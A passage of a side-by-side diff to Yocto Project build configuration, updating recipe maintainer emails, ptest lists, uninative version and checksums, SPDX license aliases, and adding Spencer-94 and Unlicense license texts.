95RECIPE_MAINTAINER_pn-cantarell-fonts = "Alexander Kanavin <alex.kanavin@gmail.com>" 95RECIPE_MAINTAINER_pn-cantarell-fonts = "Alexander Kanavin <alex.kanavin@gmail.com>"
@@ -125,7 +125,7 @@ RECIPE_MAINTAINER_pn-core-image-sato-dev = "Richard Purdie <richard.purdie@linux
125RECIPE_MAINTAINER_pn-core-image-sato-ptest-fast = "Richard Purdie <richard.purdie@linuxfoundation.org>" 125RECIPE_MAINTAINER_pn-core-image-sato-ptest-fast = "Richard Purdie <richard.purdie@linuxfoundation.org>"
126RECIPE_MAINTAINER_pn-core-image-sato-sdk-ptest = "Richard Purdie <richard.purdie@linuxfoundation.org>" 126RECIPE_MAINTAINER_pn-core-image-sato-sdk-ptest = "Richard Purdie <richard.purdie@linuxfoundation.org>"
127RECIPE_MAINTAINER_pn-coreutils = "Chen Qi <Qi.Chen@windriver.com>" 127RECIPE_MAINTAINER_pn-coreutils = "Chen Qi <Qi.Chen@windriver.com>"
128RECIPE_MAINTAINER_pn-cpio = "Denys Dmytriyenko <denys@ti.com>" 128RECIPE_MAINTAINER_pn-cpio = "Denys Dmytriyenko <denys@denix.org>"
129RECIPE_MAINTAINER_pn-cracklib = "Armin Kuster <akuster808@gmail.com>" 129RECIPE_MAINTAINER_pn-cracklib = "Armin Kuster <akuster808@gmail.com>"
130RECIPE_MAINTAINER_pn-createrepo-c = "Alexander Kanavin <alex.kanavin@gmail.com>" 130RECIPE_MAINTAINER_pn-createrepo-c = "Alexander Kanavin <alex.kanavin@gmail.com>"
131RECIPE_MAINTAINER_pn-cronie = "Anuj Mittal <anuj.mittal@intel.com>" 131RECIPE_MAINTAINER_pn-cronie = "Anuj Mittal <anuj.mittal@intel.com>"
@@ -194,7 +194,7 @@ RECIPE_MAINTAINER_pn-gcc-cross-canadian-${TRANSLATED_TARGET_ARCH} = "Khem Raj <r
194RECIPE_MAINTAINER_pn-gcc-crosssdk-${SDK_SYS} = "Khem Raj <raj.khem@gmail.com>" 194RECIPE_MAINTAINER_pn-gcc-crosssdk-${SDK_SYS} = "Khem Raj <raj.khem@gmail.com>"
195RECIPE_MAINTAINER_pn-gcc-runtime = "Khem Raj <raj.khem@gmail.com>" 195RECIPE_MAINTAINER_pn-gcc-runtime = "Khem Raj <raj.khem@gmail.com>"
196RECIPE_MAINTAINER_pn-gcc-sanitizers = "Khem Raj <raj.khem@gmail.com>" 196RECIPE_MAINTAINER_pn-gcc-sanitizers = "Khem Raj <raj.khem@gmail.com>"
197RECIPE_MAINTAINER_pn-gcc-source-9.3.0 = "Khem Raj <raj.khem@gmail.com>" 197RECIPE_MAINTAINER_pn-gcc-source-9.5.0 = "Khem Raj <raj.khem@gmail.com>"
198RECIPE_MAINTAINER_pn-gconf = "Ross Burton <ross.burton@arm.com>" 198RECIPE_MAINTAINER_pn-gconf = "Ross Burton <ross.burton@arm.com>"
199RECIPE_MAINTAINER_pn-gcr = "Alexander Kanavin <alex.kanavin@gmail.com>" 199RECIPE_MAINTAINER_pn-gcr = "Alexander Kanavin <alex.kanavin@gmail.com>"
200RECIPE_MAINTAINER_pn-gdb = "Khem Raj <raj.khem@gmail.com>" 200RECIPE_MAINTAINER_pn-gdb = "Khem Raj <raj.khem@gmail.com>"
@@ -233,7 +233,7 @@ RECIPE_MAINTAINER_pn-gobject-introspection = "Alexander Kanavin <alex.kanavin@gm
233RECIPE_MAINTAINER_pn-gperf = "Alexander Kanavin <alex.kanavin@gmail.com>" 233RECIPE_MAINTAINER_pn-gperf = "Alexander Kanavin <alex.kanavin@gmail.com>"
234RECIPE_MAINTAINER_pn-gpgme = "Hongxu Jia <hongxu.jia@windriver.com>" 234RECIPE_MAINTAINER_pn-gpgme = "Hongxu Jia <hongxu.jia@windriver.com>"
235RECIPE_MAINTAINER_pn-gptfdisk = "Alexander Kanavin <alex.kanavin@gmail.com>" 235RECIPE_MAINTAINER_pn-gptfdisk = "Alexander Kanavin <alex.kanavin@gmail.com>"
236RECIPE_MAINTAINER_pn-grep = "Denys Dmytriyenko <denys@ti.com>" 236RECIPE_MAINTAINER_pn-grep = "Denys Dmytriyenko <denys@denix.org>"
237RECIPE_MAINTAINER_pn-groff = "Hongxu Jia <hongxu.jia@windriver.com>" 237RECIPE_MAINTAINER_pn-groff = "Hongxu Jia <hongxu.jia@windriver.com>"
238RECIPE_MAINTAINER_pn-grub = "Anuj Mittal <anuj.mittal@intel.com>" 238RECIPE_MAINTAINER_pn-grub = "Anuj Mittal <anuj.mittal@intel.com>"
239RECIPE_MAINTAINER_pn-grub-bootconf = "Anuj Mittal <anuj.mittal@intel.com>" 239RECIPE_MAINTAINER_pn-grub-bootconf = "Anuj Mittal <anuj.mittal@intel.com>"
@@ -254,9 +254,9 @@ RECIPE_MAINTAINER_pn-gstreamer1.0-rtsp-server = "Anuj Mittal <anuj.mittal@intel.
254RECIPE_MAINTAINER_pn-gstreamer1.0-vaapi = "Anuj Mittal <anuj.mittal@intel.com>" 254RECIPE_MAINTAINER_pn-gstreamer1.0-vaapi = "Anuj Mittal <anuj.mittal@intel.com>"
255RECIPE_MAINTAINER_pn-gtk+3 = "Ross Burton <ross.burton@arm.com>" 255RECIPE_MAINTAINER_pn-gtk+3 = "Ross Burton <ross.burton@arm.com>"
256RECIPE_MAINTAINER_pn-gtk-doc = "Alexander Kanavin <alex.kanavin@gmail.com>" 256RECIPE_MAINTAINER_pn-gtk-doc = "Alexander Kanavin <alex.kanavin@gmail.com>"
257RECIPE_MAINTAINER_pn-gzip = "Denys Dmytriyenko <denys@ti.com>" 257RECIPE_MAINTAINER_pn-gzip = "Denys Dmytriyenko <denys@denix.org>"
258RECIPE_MAINTAINER_pn-harfbuzz = "Anuj Mittal <anuj.mittal@intel.com>" 258RECIPE_MAINTAINER_pn-harfbuzz = "Anuj Mittal <anuj.mittal@intel.com>"
259RECIPE_MAINTAINER_pn-hdparm = "Denys Dmytriyenko <denys@ti.com>" 259RECIPE_MAINTAINER_pn-hdparm = "Denys Dmytriyenko <denys@denix.org>"
260RECIPE_MAINTAINER_pn-help2man-native = "Hongxu Jia <hongxu.jia@windriver.com>" 260RECIPE_MAINTAINER_pn-help2man-native = "Hongxu Jia <hongxu.jia@windriver.com>"
261RECIPE_MAINTAINER_pn-hicolor-icon-theme = "Anuj Mittal <anuj.mittal@intel.com>" 261RECIPE_MAINTAINER_pn-hicolor-icon-theme = "Anuj Mittal <anuj.mittal@intel.com>"
262RECIPE_MAINTAINER_pn-hwlatdetect = "Alexander Kanavin <alex.kanavin@gmail.com>" 262RECIPE_MAINTAINER_pn-hwlatdetect = "Alexander Kanavin <alex.kanavin@gmail.com>"
@@ -454,10 +454,10 @@ RECIPE_MAINTAINER_pn-ltp = "Yi Zhao <yi.zhao@windriver.com>"
454RECIPE_MAINTAINER_pn-lttng-modules = "Richard Purdie <richard.purdie@linuxfoundation.org>" 454RECIPE_MAINTAINER_pn-lttng-modules = "Richard Purdie <richard.purdie@linuxfoundation.org>"
455RECIPE_MAINTAINER_pn-lttng-tools = "Richard Purdie <richard.purdie@linuxfoundation.org>" 455RECIPE_MAINTAINER_pn-lttng-tools = "Richard Purdie <richard.purdie@linuxfoundation.org>"
456RECIPE_MAINTAINER_pn-lttng-ust = "Richard Purdie <richard.purdie@linuxfoundation.org>" 456RECIPE_MAINTAINER_pn-lttng-ust = "Richard Purdie <richard.purdie@linuxfoundation.org>"
457RECIPE_MAINTAINER_pn-lz4 = "Denys Dmytriyenko <denys@ti.com>" 457RECIPE_MAINTAINER_pn-lz4 = "Denys Dmytriyenko <denys@denix.org>"
458RECIPE_MAINTAINER_pn-lzo = "Denys Dmytriyenko <denys@ti.com>" 458RECIPE_MAINTAINER_pn-lzo = "Denys Dmytriyenko <denys@denix.org>"
459RECIPE_MAINTAINER_pn-lzip = "Denys Dmytriyenko <denys@ti.com>" 459RECIPE_MAINTAINER_pn-lzip = "Denys Dmytriyenko <denys@denix.org>"
460RECIPE_MAINTAINER_pn-lzop = "Denys Dmytriyenko <denys@ti.com>" 460RECIPE_MAINTAINER_pn-lzop = "Denys Dmytriyenko <denys@denix.org>"
461RECIPE_MAINTAINER_pn-m4 = "Robert Yang <liezhi.yang@windriver.com>" 461RECIPE_MAINTAINER_pn-m4 = "Robert Yang <liezhi.yang@windriver.com>"
462RECIPE_MAINTAINER_pn-m4-native = "Robert Yang <liezhi.yang@windriver.com>" 462RECIPE_MAINTAINER_pn-m4-native = "Robert Yang <liezhi.yang@windriver.com>"
463RECIPE_MAINTAINER_pn-make = "Robert Yang <liezhi.yang@windriver.com>" 463RECIPE_MAINTAINER_pn-make = "Robert Yang <liezhi.yang@windriver.com>"
@@ -501,7 +501,7 @@ RECIPE_MAINTAINER_pn-mpeg2dec = "Alexander Kanavin <alex.kanavin@gmail.com>"
501RECIPE_MAINTAINER_pn-mpfr = "Khem Raj <raj.khem@gmail.com>" 501RECIPE_MAINTAINER_pn-mpfr = "Khem Raj <raj.khem@gmail.com>"
502RECIPE_MAINTAINER_pn-mpg123 = "Alexander Kanavin <alex.kanavin@gmail.com>" 502RECIPE_MAINTAINER_pn-mpg123 = "Alexander Kanavin <alex.kanavin@gmail.com>"
503RECIPE_MAINTAINER_pn-msmtp = "Alexander Kanavin <alex.kanavin@gmail.com>" 503RECIPE_MAINTAINER_pn-msmtp = "Alexander Kanavin <alex.kanavin@gmail.com>"
504RECIPE_MAINTAINER_pn-mtd-utils = "Denys Dmytriyenko <denys@ti.com>" 504RECIPE_MAINTAINER_pn-mtd-utils = "Denys Dmytriyenko <denys@denix.org>"
505RECIPE_MAINTAINER_pn-mtdev = "Anuj Mittal <anuj.mittal@intel.com>" 505RECIPE_MAINTAINER_pn-mtdev = "Anuj Mittal <anuj.mittal@intel.com>"
506RECIPE_MAINTAINER_pn-mtools = "Anuj Mittal <anuj.mittal@intel.com>" 506RECIPE_MAINTAINER_pn-mtools = "Anuj Mittal <anuj.mittal@intel.com>"
507RECIPE_MAINTAINER_pn-musl = "Khem Raj <raj.khem@gmail.com>" 507RECIPE_MAINTAINER_pn-musl = "Khem Raj <raj.khem@gmail.com>"
@@ -545,7 +545,7 @@ RECIPE_MAINTAINER_pn-pango = "Ross Burton <ross.burton@arm.com>"
545RECIPE_MAINTAINER_pn-parted = "Hongxu Jia <hongxu.jia@windriver.com>" 545RECIPE_MAINTAINER_pn-parted = "Hongxu Jia <hongxu.jia@windriver.com>"
546RECIPE_MAINTAINER_pn-patch = "Hongxu Jia <hongxu.jia@windriver.com>" 546RECIPE_MAINTAINER_pn-patch = "Hongxu Jia <hongxu.jia@windriver.com>"
547RECIPE_MAINTAINER_pn-patchelf = "Richard Purdie <richard.purdie@linuxfoundation.org>" 547RECIPE_MAINTAINER_pn-patchelf = "Richard Purdie <richard.purdie@linuxfoundation.org>"
548RECIPE_MAINTAINER_pn-pbzip2 = "Denys Dmytriyenko <denys@ti.com>" 548RECIPE_MAINTAINER_pn-pbzip2 = "Denys Dmytriyenko <denys@denix.org>"
549RECIPE_MAINTAINER_pn-pciutils = "Chen Qi <Qi.Chen@windriver.com>" 549RECIPE_MAINTAINER_pn-pciutils = "Chen Qi <Qi.Chen@windriver.com>"
550RECIPE_MAINTAINER_pn-pcmanfm = "Alexander Kanavin <alex.kanavin@gmail.com>" 550RECIPE_MAINTAINER_pn-pcmanfm = "Alexander Kanavin <alex.kanavin@gmail.com>"
551RECIPE_MAINTAINER_pn-perf = "Bruce Ashfield <bruce.ashfield@gmail.com>" 551RECIPE_MAINTAINER_pn-perf = "Bruce Ashfield <bruce.ashfield@gmail.com>"
@@ -576,6 +576,7 @@ RECIPE_MAINTAINER_pn-python3 = "Oleksandr Kravchuk <open.source@oleksandr-kravch
576RECIPE_MAINTAINER_pn-python3-async = "Oleksandr Kravchuk <open.source@oleksandr-kravchuk.com>" 576RECIPE_MAINTAINER_pn-python3-async = "Oleksandr Kravchuk <open.source@oleksandr-kravchuk.com>"
577RECIPE_MAINTAINER_pn-python3-dbus = "Oleksandr Kravchuk <open.source@oleksandr-kravchuk.com>" 577RECIPE_MAINTAINER_pn-python3-dbus = "Oleksandr Kravchuk <open.source@oleksandr-kravchuk.com>"
578RECIPE_MAINTAINER_pn-python3-docutils = "Oleksandr Kravchuk <open.source@oleksandr-kravchuk.com>" 578RECIPE_MAINTAINER_pn-python3-docutils = "Oleksandr Kravchuk <open.source@oleksandr-kravchuk.com>"
579RECIPE_MAINTAINER_pn-python3-dtschema-wrapper = "Bruce Ashfield <bruce.ashfield@gmail.com>"
579RECIPE_MAINTAINER_pn-python3-pycryptodome = "Joshua Watt <JPEWhacker@gmail.com>" 580RECIPE_MAINTAINER_pn-python3-pycryptodome = "Joshua Watt <JPEWhacker@gmail.com>"
580RECIPE_MAINTAINER_pn-python3-pycryptodomex = "Joshua Watt <JPEWhacker@gmail.com>" 581RECIPE_MAINTAINER_pn-python3-pycryptodomex = "Joshua Watt <JPEWhacker@gmail.com>"
581RECIPE_MAINTAINER_pn-python3-extras = "Oleksandr Kravchuk <open.source@oleksandr-kravchuk.com>" 582RECIPE_MAINTAINER_pn-python3-extras = "Oleksandr Kravchuk <open.source@oleksandr-kravchuk.com>"
@@ -661,9 +662,9 @@ RECIPE_MAINTAINER_pn-systemd-conf = "Chen Qi <Qi.Chen@windriver.com>"
661RECIPE_MAINTAINER_pn-systemd-compat-units = "Chen Qi <Qi.Chen@windriver.com>" 662RECIPE_MAINTAINER_pn-systemd-compat-units = "Chen Qi <Qi.Chen@windriver.com>"
662RECIPE_MAINTAINER_pn-systemd-serialgetty = "Chen Qi <Qi.Chen@windriver.com>" 663RECIPE_MAINTAINER_pn-systemd-serialgetty = "Chen Qi <Qi.Chen@windriver.com>"
663RECIPE_MAINTAINER_pn-systemd-systemctl-native = "Chen Qi <Qi.Chen@windriver.com>" 664RECIPE_MAINTAINER_pn-systemd-systemctl-native = "Chen Qi <Qi.Chen@windriver.com>"
664RECIPE_MAINTAINER_pn-systemtap = "Victor Kamensky <kamensky@cisco.com>" 665RECIPE_MAINTAINER_pn-systemtap = "Victor Kamensky <victor.kamensky7@gmail.com>"
665RECIPE_MAINTAINER_pn-systemtap-native = "Victor Kamensky <kamensky@cisco.com>" 666RECIPE_MAINTAINER_pn-systemtap-native = "Victor Kamensky <victor.kamensky7@gmail.com>"
666RECIPE_MAINTAINER_pn-systemtap-uprobes = "Victor Kamensky <kamensky@cisco.com>" 667RECIPE_MAINTAINER_pn-systemtap-uprobes = "Victor Kamensky <victor.kamensky7@gmail.com>"
667RECIPE_MAINTAINER_pn-sysvinit = "Ross Burton <ross.burton@arm.com>" 668RECIPE_MAINTAINER_pn-sysvinit = "Ross Burton <ross.burton@arm.com>"
668RECIPE_MAINTAINER_pn-sysvinit-inittab = "Ross Burton <ross.burton@arm.com>" 669RECIPE_MAINTAINER_pn-sysvinit-inittab = "Ross Burton <ross.burton@arm.com>"
669RECIPE_MAINTAINER_pn-taglib = "Anuj Mittal <anuj.mittal@intel.com>" 670RECIPE_MAINTAINER_pn-taglib = "Anuj Mittal <anuj.mittal@intel.com>"
@@ -685,7 +686,7 @@ RECIPE_MAINTAINER_pn-udev-extraconf = "Ross Burton <ross.burton@arm.com>"
685RECIPE_MAINTAINER_pn-unfs3 = "Ross Burton <ross.burton@arm.com>" 686RECIPE_MAINTAINER_pn-unfs3 = "Ross Burton <ross.burton@arm.com>"
686RECIPE_MAINTAINER_pn-unifdef = "Ross Burton <ross.burton@arm.com>" 687RECIPE_MAINTAINER_pn-unifdef = "Ross Burton <ross.burton@arm.com>"
687RECIPE_MAINTAINER_pn-uninative-tarball = "Richard Purdie <richard.purdie@linuxfoundation.org>" 688RECIPE_MAINTAINER_pn-uninative-tarball = "Richard Purdie <richard.purdie@linuxfoundation.org>"
688RECIPE_MAINTAINER_pn-unzip = "Denys Dmytriyenko <denys@ti.com>" 689RECIPE_MAINTAINER_pn-unzip = "Denys Dmytriyenko <denys@denix.org>"
689RECIPE_MAINTAINER_pn-update-rc.d = "Ross Burton <ross.burton@arm.com>" 690RECIPE_MAINTAINER_pn-update-rc.d = "Ross Burton <ross.burton@arm.com>"
690RECIPE_MAINTAINER_pn-usbinit = "Alexander Kanavin <alex.kanavin@gmail.com>" 691RECIPE_MAINTAINER_pn-usbinit = "Alexander Kanavin <alex.kanavin@gmail.com>"
691RECIPE_MAINTAINER_pn-usbutils = "Alexander Kanavin <alex.kanavin@gmail.com>" 692RECIPE_MAINTAINER_pn-usbutils = "Alexander Kanavin <alex.kanavin@gmail.com>"
@@ -706,11 +707,11 @@ RECIPE_MAINTAINER_pn-vulkan-tools = "Anuj Mittal <anuj.mittal@intel.com>"
706RECIPE_MAINTAINER_pn-waffle = "Ross Burton <ross.burton@arm.com>" 707RECIPE_MAINTAINER_pn-waffle = "Ross Burton <ross.burton@arm.com>"
707RECIPE_MAINTAINER_pn-watchdog = "Alexander Kanavin <alex.kanavin@gmail.com>" 708RECIPE_MAINTAINER_pn-watchdog = "Alexander Kanavin <alex.kanavin@gmail.com>"
708RECIPE_MAINTAINER_pn-watchdog-config = "Alexander Kanavin <alex.kanavin@gmail.com>" 709RECIPE_MAINTAINER_pn-watchdog-config = "Alexander Kanavin <alex.kanavin@gmail.com>"
709RECIPE_MAINTAINER_pn-wayland = "Denys Dmytriyenko <denys@ti.com>" 710RECIPE_MAINTAINER_pn-wayland = "Denys Dmytriyenko <denys@denix.org>"
710RECIPE_MAINTAINER_pn-wayland-protocols = "Denys Dmytriyenko <denys@ti.com>" 711RECIPE_MAINTAINER_pn-wayland-protocols = "Denys Dmytriyenko <denys@denix.org>"
711RECIPE_MAINTAINER_pn-webkitgtk = "Alexander Kanavin <alex.kanavin@gmail.com>" 712RECIPE_MAINTAINER_pn-webkitgtk = "Alexander Kanavin <alex.kanavin@gmail.com>"
712RECIPE_MAINTAINER_pn-weston = "Denys Dmytriyenko <denys@ti.com>" 713RECIPE_MAINTAINER_pn-weston = "Denys Dmytriyenko <denys@denix.org>"
713RECIPE_MAINTAINER_pn-weston-init = "Denys Dmytriyenko <denys@ti.com>" 714RECIPE_MAINTAINER_pn-weston-init = "Denys Dmytriyenko <denys@denix.org>"
714RECIPE_MAINTAINER_pn-wget = "Yi Zhao <yi.zhao@windriver.com>" 715RECIPE_MAINTAINER_pn-wget = "Yi Zhao <yi.zhao@windriver.com>"
715RECIPE_MAINTAINER_pn-which = "Anuj Mittal <anuj.mittal@intel.com>" 716RECIPE_MAINTAINER_pn-which = "Anuj Mittal <anuj.mittal@intel.com>"
716RECIPE_MAINTAINER_pn-wic-tools = "Anuj Mittal <anuj.mittal@intel.com>" 717RECIPE_MAINTAINER_pn-wic-tools = "Anuj Mittal <anuj.mittal@intel.com>"
@@ -764,6 +765,6 @@ RECIPE_MAINTAINER_pn-xtrans = "Armin Kuster <akuster808@gmail.com>"
764RECIPE_MAINTAINER_pn-xuser-account = "Armin Kuster <akuster808@gmail.com>" 765RECIPE_MAINTAINER_pn-xuser-account = "Armin Kuster <akuster808@gmail.com>"
765RECIPE_MAINTAINER_pn-xvinfo = "Armin Kuster <akuster808@gmail.com>" 766RECIPE_MAINTAINER_pn-xvinfo = "Armin Kuster <akuster808@gmail.com>"
766RECIPE_MAINTAINER_pn-xwininfo = "Armin Kuster <akuster808@gmail.com>" 767RECIPE_MAINTAINER_pn-xwininfo = "Armin Kuster <akuster808@gmail.com>"
767RECIPE_MAINTAINER_pn-xz = "Denys Dmytriyenko <denys@ti.com>" 768RECIPE_MAINTAINER_pn-xz = "Denys Dmytriyenko <denys@denix.org>"
768RECIPE_MAINTAINER_pn-zip = "Denys Dmytriyenko <denys@ti.com>" 769RECIPE_MAINTAINER_pn-zip = "Denys Dmytriyenko <denys@denix.org>"
769RECIPE_MAINTAINER_pn-zlib = "Denys Dmytriyenko <denys@ti.com>" 770RECIPE_MAINTAINER_pn-zlib = "Denys Dmytriyenko <denys@denix.org>"
diff --git a/meta/conf/distro/include/ptest-packagelists.inc b/meta/conf/distro/include/ptest-packagelists.inc
index c13ff724b1..3fb7ec2657 100644
--- a/meta/conf/distro/include/ptest-packagelists.inc
+++ b/meta/conf/distro/include/ptest-packagelists.inc
@@ -26,6 +26,7 @@ PTESTS_FAST = "\
26 liberror-perl-ptest \ 26 liberror-perl-ptest \
27 libmodule-build-perl-ptest \ 27 libmodule-build-perl-ptest \
28 libpcre-ptest \ 28 libpcre-ptest \
29 libpng-ptest \
29 libtimedate-perl-ptest \ 30 libtimedate-perl-ptest \
30 libtest-needs-perl-ptest \ 31 libtest-needs-perl-ptest \
31 liburi-perl-ptest \ 32 liburi-perl-ptest \
@@ -60,6 +61,7 @@ PTESTS_FAST = "\
60# bash-ptest \ # Test outcomes are non-deterministic by design 61# bash-ptest \ # Test outcomes are non-deterministic by design
61# ifupdown-ptest \ # Tested separately in lib/oeqa/selftest/cases/imagefeatures.py 62# ifupdown-ptest \ # Tested separately in lib/oeqa/selftest/cases/imagefeatures.py
62# mdadm-ptest \ # Tests rely on non-deterministic sleep() amounts 63# mdadm-ptest \ # Tests rely on non-deterministic sleep() amounts
64# libinput-ptest \ # Tests need an unloaded system to be reliable
63#" 65#"
64 66
65PTESTS_SLOW = "\ 67PTESTS_SLOW = "\
diff --git a/meta/conf/distro/include/yocto-uninative.inc b/meta/conf/distro/include/yocto-uninative.inc
index 85336014b1..4ac66fd506 100644
--- a/meta/conf/distro/include/yocto-uninative.inc
+++ b/meta/conf/distro/include/yocto-uninative.inc
@@ -6,9 +6,10 @@
6# to the distro running on the build machine. 6# to the distro running on the build machine.
7# 7#
8 8
9UNINATIVE_MAXGLIBCVERSION = "2.32" 9UNINATIVE_MAXGLIBCVERSION = "2.39"
10UNINATIVE_VERSION = "4.4"
10 11
11UNINATIVE_URL ?= "http://downloads.yoctoproject.org/releases/uninative/2.10/" 12UNINATIVE_URL ?= "http://downloads.yoctoproject.org/releases/uninative/${UNINATIVE_VERSION}/"
12UNINATIVE_CHECKSUM[aarch64] ?= "645e5c50b2b48aabb8b10f783a9f94b4b7c5ddc7cfceb5386d43b86d30253202" 13UNINATIVE_CHECKSUM[aarch64] ?= "b61876130f494f75092f21086b4a64ea5fb064045769bf1d32e9cb6af17ea8ec"
13UNINATIVE_CHECKSUM[i686] ?= "233e09b5ff30e15341232a0c16fa8448ff31dccb8f3f3e2ad3948cdac8c4a598" 14UNINATIVE_CHECKSUM[i686] ?= "9f28627828f0082cc0344eede4d9a861a9a064bfa8f36e072e46212f0fe45fcc"
14UNINATIVE_CHECKSUM[x86_64] ?= "04333677f81990ce2cf55c3bc256cd84a66085d18fc95ccddfab8581e4aec014" 15UNINATIVE_CHECKSUM[x86_64] ?= "d81c54284be2bb886931fc87281d58177a2cd381cf99d1981f8923039a72a302"
diff --git a/meta/conf/layer.conf b/meta/conf/layer.conf
index 1c432275be..7453655417 100644
--- a/meta/conf/layer.conf
+++ b/meta/conf/layer.conf
@@ -102,4 +102,4 @@ SSTATE_EXCLUDEDEPS_SYSROOT += ".*->autoconf-archive-native"
102# We need to keep bitbake tools in PATH 102# We need to keep bitbake tools in PATH
103# Avoid empty path entries 103# Avoid empty path entries
104BITBAKEPATH := "${@os.path.dirname(bb.utils.which(d.getVar('PATH'),'bitbake'))}" 104BITBAKEPATH := "${@os.path.dirname(bb.utils.which(d.getVar('PATH'),'bitbake'))}"
105PATH := "${@'${BITBAKEPATH}:' if '${BITBAKEPATH}' is not '' else ''}${HOSTTOOLS_DIR}" 105PATH := "${@'${BITBAKEPATH}:' if '${BITBAKEPATH}' != '' else ''}${HOSTTOOLS_DIR}"
diff --git a/meta/conf/licenses.conf b/meta/conf/licenses.conf
index 5b309eb385..c78823e847 100644
--- a/meta/conf/licenses.conf
+++ b/meta/conf/licenses.conf
@@ -13,24 +13,39 @@
13SPDXLICENSEMAP[AGPL-3] = "AGPL-3.0" 13SPDXLICENSEMAP[AGPL-3] = "AGPL-3.0"
14SPDXLICENSEMAP[AGPLv3] = "AGPL-3.0" 14SPDXLICENSEMAP[AGPLv3] = "AGPL-3.0"
15SPDXLICENSEMAP[AGPLv3.0] = "AGPL-3.0" 15SPDXLICENSEMAP[AGPLv3.0] = "AGPL-3.0"
16SPDXLICENSEMAP[AGPL-3.0-only] = "AGPL-3.0"
16 17
17# GPL variations 18# GPL variations
18SPDXLICENSEMAP[GPL-1] = "GPL-1.0" 19SPDXLICENSEMAP[GPL-1] = "GPL-1.0"
19SPDXLICENSEMAP[GPLv1] = "GPL-1.0" 20SPDXLICENSEMAP[GPLv1] = "GPL-1.0"
20SPDXLICENSEMAP[GPLv1.0] = "GPL-1.0" 21SPDXLICENSEMAP[GPLv1.0] = "GPL-1.0"
22SPDXLICENSEMAP[GPL-1.0-only] = "GPL-1.0"
21SPDXLICENSEMAP[GPL-2] = "GPL-2.0" 23SPDXLICENSEMAP[GPL-2] = "GPL-2.0"
22SPDXLICENSEMAP[GPLv2] = "GPL-2.0" 24SPDXLICENSEMAP[GPLv2] = "GPL-2.0"
25SPDXLICENSEMAP[GPLv2+] = "GPL-2.0+"
23SPDXLICENSEMAP[GPLv2.0] = "GPL-2.0" 26SPDXLICENSEMAP[GPLv2.0] = "GPL-2.0"
27SPDXLICENSEMAP[GPLv2.0+] = "GPL-2.0+"
28SPDXLICENSEMAP[GPL-2.0-only] = "GPL-2.0"
24SPDXLICENSEMAP[GPL-3] = "GPL-3.0" 29SPDXLICENSEMAP[GPL-3] = "GPL-3.0"
25SPDXLICENSEMAP[GPLv3] = "GPL-3.0" 30SPDXLICENSEMAP[GPLv3] = "GPL-3.0"
31SPDXLICENSEMAP[GPLv3+] = "GPL-3.0+"
26SPDXLICENSEMAP[GPLv3.0] = "GPL-3.0" 32SPDXLICENSEMAP[GPLv3.0] = "GPL-3.0"
33SPDXLICENSEMAP[GPLv3.0+] = "GPL-3.0+"
34SPDXLICENSEMAP[GPL-3.0-only] = "GPL-3.0"
27 35
28#LGPL variations 36#LGPL variations
29SPDXLICENSEMAP[LGPLv2] = "LGPL-2.0" 37SPDXLICENSEMAP[LGPLv2] = "LGPL-2.0"
38SPDXLICENSEMAP[LGPLv2+] = "LGPL-2.0+"
30SPDXLICENSEMAP[LGPLv2.0] = "LGPL-2.0" 39SPDXLICENSEMAP[LGPLv2.0] = "LGPL-2.0"
40SPDXLICENSEMAP[LGPLv2.0+] = "LGPL-2.0+"
41SPDXLICENSEMAP[LGPL-2.0-only] = "LGPL-2.0"
31SPDXLICENSEMAP[LGPL2.1] = "LGPL-2.1" 42SPDXLICENSEMAP[LGPL2.1] = "LGPL-2.1"
32SPDXLICENSEMAP[LGPLv2.1] = "LGPL-2.1" 43SPDXLICENSEMAP[LGPLv2.1] = "LGPL-2.1"
44SPDXLICENSEMAP[LGPLv2.1+] = "LGPL-2.1+"
45SPDXLICENSEMAP[LGPL-2.1-only] = "LGPL-2.1"
33SPDXLICENSEMAP[LGPLv3] = "LGPL-3.0" 46SPDXLICENSEMAP[LGPLv3] = "LGPL-3.0"
47SPDXLICENSEMAP[LGPLv3+] = "LGPL-3.0+"
48SPDXLICENSEMAP[LGPL-3.0-only] = "LGPL-3.0"
34 49
35#MPL variations 50#MPL variations
36SPDXLICENSEMAP[MPL-1] = "MPL-1.0" 51SPDXLICENSEMAP[MPL-1] = "MPL-1.0"
diff --git a/meta/conf/multilib.conf b/meta/conf/multilib.conf
index d231107f8b..e9767c73b6 100644
--- a/meta/conf/multilib.conf
+++ b/meta/conf/multilib.conf
@@ -11,6 +11,8 @@ STAGING_DIR_TARGET = "${WORKDIR}/${MLPREFIX}recipe-sysroot"
11RECIPE_SYSROOT = "${WORKDIR}/${MLPREFIX}recipe-sysroot" 11RECIPE_SYSROOT = "${WORKDIR}/${MLPREFIX}recipe-sysroot"
12RECIPE_SYSROOT_class-native = "${WORKDIR}/recipe-sysroot" 12RECIPE_SYSROOT_class-native = "${WORKDIR}/recipe-sysroot"
13 13
14PSEUDO_IGNORE_PATHS .= ",${WORKDIR}/${MLPREFIX}recipe-sysroot"
15
14INHERIT += "multilib_global" 16INHERIT += "multilib_global"
15 17
16BBCLASSEXTEND_append = " ${MULTILIBS}" 18BBCLASSEXTEND_append = " ${MULTILIBS}"
diff --git a/meta/files/common-licenses/Spencer-94 b/meta/files/common-licenses/Spencer-94
new file mode 100644
index 0000000000..75ba7f7d2e
--- /dev/null
+++ b/meta/files/common-licenses/Spencer-94
@@ -0,0 +1,12 @@
1Copyright 1992, 1993, 1994 Henry Spencer. All rights reserved.
2This software is not subject to any license of the American Telephone and Telegraph Company or of the Regents of the University of California.
3
4Permission is granted to anyone to use this software for any purpose on any computer system, and to alter it and redistribute it, subject to the following restrictions:
5
61. The author is not responsible for the consequences of use of this software, no matter how awful, even if they arise from flaws in it.
7
82. The origin of this software must not be misrepresented, either by explicit claim or by omission. Since few users ever read sources, credits must appear in the documentation.
9
103. Altered versions must be plainly marked as such, and must not be misrepresented as being the original software. Since few users ever read sources, credits must appear in the documentation.
11
124. This notice may not be removed or altered.
diff --git a/meta/files/common-licenses/Unlicense b/meta/files/common-licenses/Unlicense
new file mode 100644
index 0000000000..68a49daad8
--- /dev/null
+++ b/meta/files/common-licenses/Unlicense
@@ -0,0 +1,24 @@
1This is free and unencumbered software released into the public domain.
2
3Anyone is free to copy, modify, publish, use, compile, sell, or
4distribute this software, either in source code form or as a compiled
5binary, for any purpose, commercial or non-commercial, and by any
6means.
7
8In jurisdictions that recognize copyright laws, the author or authors
9of this software dedicate any and all copyright interest in the
10software to the public domain. We make this dedication for the benefit
11of the public at large and to the detriment of our heirs and
12successors. We intend this dedication to be an overt act of
13relinquishment in perpetuity of all present and future rights to this
14software under copyright law.
15
